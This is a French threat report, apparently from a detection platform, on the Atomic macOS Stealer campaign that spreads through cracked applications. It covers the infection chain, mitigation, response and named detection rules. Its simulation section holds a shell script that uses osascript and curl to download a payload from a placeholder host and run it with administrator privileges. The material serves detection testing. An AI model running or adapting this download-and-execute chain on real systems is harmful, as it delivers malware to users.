Le voleur AMOS cible macOS via des applications « crackées »
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Le rapport décrit une campagne distribuant Atomic macOS Stealer (AMOS) en le déguisant en applications piratées ou en instruisant les utilisateurs à exécuter des commandes de terminal copiées-collées. Une fois exécuté, le malware collecte un ensemble large de données sensibles, y compris des identifiants, des informations sur les navigateurs, des portefeuilles de cryptomonnaie, des fichiers d’applications de messagerie, des profils VPN et des documents personnels, puis exfiltre le contenu volé via HTTP ou HTTPS. Pour éviter la détection statique, les opérateurs changent de domaine et d’URLs tout au long de la campagne. L’activité vise les utilisateurs de macOS, en particulier ceux qui recherchent des logiciels non officiels ou piratés.
Investigation
La télémétrie Trend Vision One a été utilisée pour reconstruire toute la chaîne d’infection, débutant avec le téléchargement d’applications piratées depuis haxmac.cc, suivie d’une redirection via des domaines intermédiaires, l’exécution de scripts shell malveillants, la création de démons de lancement pour la persistance, la préparation des données dans /tmp, la compression des données dans des archives ZIP, et l’exfiltration vers des domaines contrôlés par les attaquants avec rotation. Les chercheurs ont capturé les lignes de commande pertinentes, les chemins de fichier et les indicateurs comportementaux associés à chaque étape de la compromission.
Atténuation
Les organisations devraient informer les utilisateurs des risques liés aux logiciels piratés et aux commandes de terminal copiées-collées, appliquer les contrôles Gatekeeper et de notarisation, et limiter l’exécution inutile de scripts sur les systèmes macOS. Les défenseurs devraient également surveiller les activités suspectes de curl and osascript et bloquer l’accès aux domaines et adresses IP malveillants connus. Les détections sur les points finaux devraient se concentrer sur la création non autorisée de démons de lancement, le placement de fichiers cachés, et un comportement inhabituel de collecte ou d’exfiltration de fichiers.
Réponse
Si une activité AMOS est détectée, isoler le point final affecté, terminer les processus malveillants, supprimer les fichiers cachés tels que .helper, .agent, et com.finder.helper.plist, et supprimer toutes les données mises en scène pour l’exfiltration. Les identifiants compromis devraient être révoqués et une analyse médico-légale devrait être réalisée sur toutes les archives récupérées. L’infrastructure malveillante identifiée devrait être bloquée, et le contenu de détection devrait être mis à jour pour surveiller les motifs de commande observés.
Flux d’attaque
Détections
Utilisation suspecte de Ditto pour l’archivage et l’exfiltration de fichiers sur macOS (via process_creation)
Voir
Possibilité de mise en scène de plusieurs fichiers dans le répertoire TMP pour l’exfiltration (via file_event)
Voir
Atomic MacOS Stealer – Activité FileGrabber
Voir
Possible copie des données de connexion Chrome vers le répertoire TMP (via process_creation)
Voir
IOCs (HashSha1) pour détecter : Analyse de la campagne AMOS Stealer ciblant macOS via des applications ‘craquées’
Voir
IOCs (SourceIP) pour détecter : Analyse de la campagne AMOS Stealer ciblant macOS via des applications ‘craquées’
Voir
IOCs (DestinationIP) pour détecter : Analyse de la campagne AMOS Stealer ciblant macOS via des applications ‘craquées’
Voir
Détection de l’exécution d’AMOS Stealer via des commandes Terminal sur macOS [Création de processus Linux]
Voir
Détection de l’exécution d’AMOS Stealer via AppleScript et Curl [Création de processus Linux]
Voir
Exécution de Simulation
Condition préalable : Le contrôle préalable de la télémétrie et de la ligne de base doit avoir réussi.
Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et la narration DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à une mauvaise interprétation.
-
Narratif de l’attaque & Commandes :
Un adversaire a obtenu un leurre de phishing qui livre une charge utile AppleScript courte. Le script utiliseosascriptpour exécuter une commande shell (sh -c) qui invoquecurlpour télécharger le binaire AMOS stealer depuis un serveur C2 malveillant, le stocke dans le~/Library/Application Support/dossier de l’utilisateur, et l’exécute ensuite avec des privilèges élevés. L’utilisation deosascript(un binaire Apple signé) masque l’activité en tant qu’automatisation légitime, tandis quecurlassure un téléchargement réseau discret. -
Script de test de régression :
# amos_stealer_simulation.sh # Simuler l'exécution d'AMOS stealer sur macOS utilisant osascript + curl # 1. Définir l'URL malveillante (utiliser un emplacement inoffensif pour la sécurité) MALICIOUS_URL="https://example.com/malicious_payload.sh" # 2. AppleScript qui exécute une commande shell pour télécharger & exécuter la charge utile APPLESCRIPT=$(cat <<'EOF' do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges EOF ) # 3. Exécuter l'AppleScript via osascript echo "$APPLESCRIPT" | osascript # 4. Pause brève pour permettre à la charge utile de s'exécuter sleep 5 -
Commandes de nettoyage :
# cleanup_amos_simulation.sh # Supprimer les artefacts créés par la simulation # Supprimer la charge utile téléchargée rm -f /tmp/payload.sh # Révoquer les processus élevés temporaires (si encore en cours) pkill -f "/tmp/payload.sh" || true # Facultativement, effacer l'historique d'exécution d'AppleScript # (macOS ne conserve pas un historique persistant pour osascript) echo "Nettoyage terminé."